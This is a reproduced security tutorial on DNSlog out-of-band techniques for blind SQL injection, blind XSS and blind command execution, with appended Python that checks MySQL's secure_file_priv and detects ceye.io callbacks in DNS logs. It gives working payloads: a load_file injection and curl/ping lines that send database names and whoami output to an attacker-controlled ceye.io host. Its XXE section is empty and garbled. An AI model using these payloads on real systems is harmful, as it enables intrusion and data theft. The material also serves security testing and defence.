How to reasonably use DNSLOG to conduct echo-free security testing

When testing a website for security issues, some test commands produce no visible response after execution. We can write scripts for blind injection, but some websites will then block our IP address. Setting up an IP proxy pool works around that, but blind injection is still often inefficient, which is where DNSlog injection comes in.

Before using dnslog, we need to understand the backtick symbol:
Symbol: `
Name: backtick, upper delimiter
Position: this character is usually in the upper left corner of the keyboard, to the left of the number 1. Do not confuse it with the single quote.
Function: a string enclosed in backticks is interpreted by the shell as a command line. The shell first executes that command line and then replaces the whole backtick expression (including the two backticks) with its standard output.
The DNSlog echo test is as follows:
First, you need a domain name you can configure, such as ceye.io. Through the domain's registrar, set the nameserver of ceye.io to your own server A, then configure a DNS server on server A so that all queries for ceye.io and its subdomains go to server A. Domain name query requests can then be monitored in real time, as shown in the figure below.
DNS resolution leaves logs. Our goal is to read the resolution logs for multi-level domain names to obtain information.
Simply put, the information is placed in a higher-level subdomain label and sent to a server you control, and then you read the log to get the information.
The principle is quite abstract, so let's look at it through practical examples.
http://ceye.io is a free platform for recording DNS logs. After registration, the control panel gives you a second-level domain name: xxx.ceye.io. When we put the injected information into the third-level domain label, it is recorded in the backend log.

0x01 SQL blind injection
Take SQL blind injection as an example to understand the DNSlog injection process in depth.
Blind injection through DNSlog relies on the load_file() function, so it generally requires root permissions. Run show variables like '%secure%'; to check which disks load_file() can read.
1. When secure_file_priv is empty, any directory on the disk can be read.
2. When secure_file_priv is G:\, files on the G drive can be read.
3. When secure_file_priv is NULL, load_file() cannot load files.
This is configured in my.ini. With secure_file_priv="", load_file() can load files from any disk.
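To check which of the three cases above a server is configured for, the following Python is an added example (not part of the original article). The my.ini text, the function names and the result labels are constructed for illustration; when the option is unset, the server's built-in default applies and should be confirmed with show variables like '%secure%';.

```python
# Constructed my.ini text for illustration; not taken from a real server.
WEAK_INI = '''
[client]
secure_file_priv=NULL
[mysqld]
# test box
datadir="C:/mysql/data"
secure-file-priv=NULL
secure_file_priv=""
'''
# Same file with the last [mysqld] setting corrected.
HARDENED_INI = WEAK_INI.replace('secure_file_priv=""', 'secure_file_priv=NULL')

def mysqld_secure_file_priv(ini_text):
    """Return the effective secure_file_priv from [mysqld], or None if unset."""
    section, value = "", None
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        key, _, val = line.partition("=")
        # Option names accept '-' and '_' interchangeably; the last instance wins.
        if section == "mysqld" and key.strip().lower().replace("-", "_") == "secure_file_priv":
            value = val.strip().strip("\"'")
    return value

def classify(value):
    """Map the raw value onto the three cases listed in the article."""
    if value is None:
        return "unset"          # built-in default applies; verify on the server
    if value == "":
        return "unrestricted"   # case 1: load_file() can read any directory
    if value.upper() == "NULL":
        return "disabled"       # case 3: load_file() cannot load files
    return "restricted:" + value  # case 2: only this directory

if __name__ == "__main__":
    print("weak:", classify(mysqld_secure_file_priv(WEAK_INI)))
    print("hardened:", classify(mysqld_secure_file_priv(HARDENED_INI)))
```

A result of "unrestricted" is the setting the DNSlog technique in this section depends on; "disabled" removes that path.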
Execute on the mysql command line: select load_file('\\afanti.xxxx.ceye.io\aaa'); where afanti marks the place where the injected query statement goes.
Check the platform: the DNS log entry has been recorded.
The load_file() function can issue requests that are resolved through DNS.
Take the fifth level of sql-labs as an example:
payload: ' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)-- -
Executed SQL statement: SELECT * FROM users WHERE id='1' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)
Check the dnslog log: it shows that the database name, security, was queried:

0x02 XSS (no echo)
With blind XSS, the browser of whoever triggers the payload is made to access a preset link address. If the blind XSS succeeds, the following link access record is received on the platform:
payload: ><img src=http://xss.xxxx.ceye.io/aaa>
The src attribute makes the browser request our dnslog platform.

0x03 ×××F (no echo)
payload:



%remote;]>

0x04 Command execution (no echo)
When a domain name is pinged, a recursive DNS query is performed for it, and that DNS query request can be observed on the backend. If the command is actually executed and the platform receives the callback, that proves the vulnerability exists.
Linux
curl http://haha.xxx.ceye.io/`whoami`

ping `whoami`.xxxx.ceye.io

Windows
ping %USERNAME%.xxx.ceye.io
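
On the defending side, every technique in this article ends in a DNS query of the form data.identifier.ceye.io, which is visible in resolver logs. The following Python is an added example (not part of the original article) that flags such queries and recovers the label that carried the data; the log line format, client addresses and function names are constructed for illustration.

```python
from collections import defaultdict

# Zones of DNSlog platforms to watch; ceye.io is the one this article uses.
WATCHED_ZONES = ("ceye.io",)

# Constructed sample resolver log: "<time> <client ip> <query name> <type>"
SAMPLE_LOG = """\
2025-03-05T10:00:01 10.0.3.17 security.xxxxx.ceye.io. A
2025-03-05T10:00:02 10.0.3.17 www.example.com. A
2025-03-05T10:00:09 10.0.5.40 WWW-DATA.xxxx.CEYE.io. A
2025-03-05T10:00:11 10.0.5.41 notceye.io. A
2025-03-05T10:00:15 10.0.5.40 xxxx.ceye.io. AAAA
"""

def split_callback(qname, zones=WATCHED_ZONES):
    """Return (zone, account_label, data_labels) if qname is under a watched zone."""
    labels = qname.rstrip(".").lower().split(".")
    for zone in zones:
        z = zone.split(".")
        # Compare whole labels so "notceye.io" does not match "ceye.io".
        if len(labels) > len(z) and labels[-len(z):] == z:
            sub = labels[:-len(z)]
            return zone, sub[-1], sub[:-1]
    return None

def find_callbacks(log_text):
    """Group suspected out-of-band callbacks by the internal client that issued them."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        _, client, qname, _ = parts
        parsed = split_callback(qname)
        if parsed:
            zone, account, data = parsed
            hits[client].append({"zone": zone, "account": account,
                                 "leaked": ".".join(data)})
    return dict(hits)

if __name__ == "__main__":
    for client, events in find_callbacks(SAMPLE_LOG).items():
        for event in events:
            print(client, event)
```

The client address identifies the internal host (database server, web server or user browser) whose resolver made the lookup, which is where the investigation starts.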


Statement
This article is reproduced from: 亿速云. If there is any infringement, please contact admin@php.cn to have it deleted.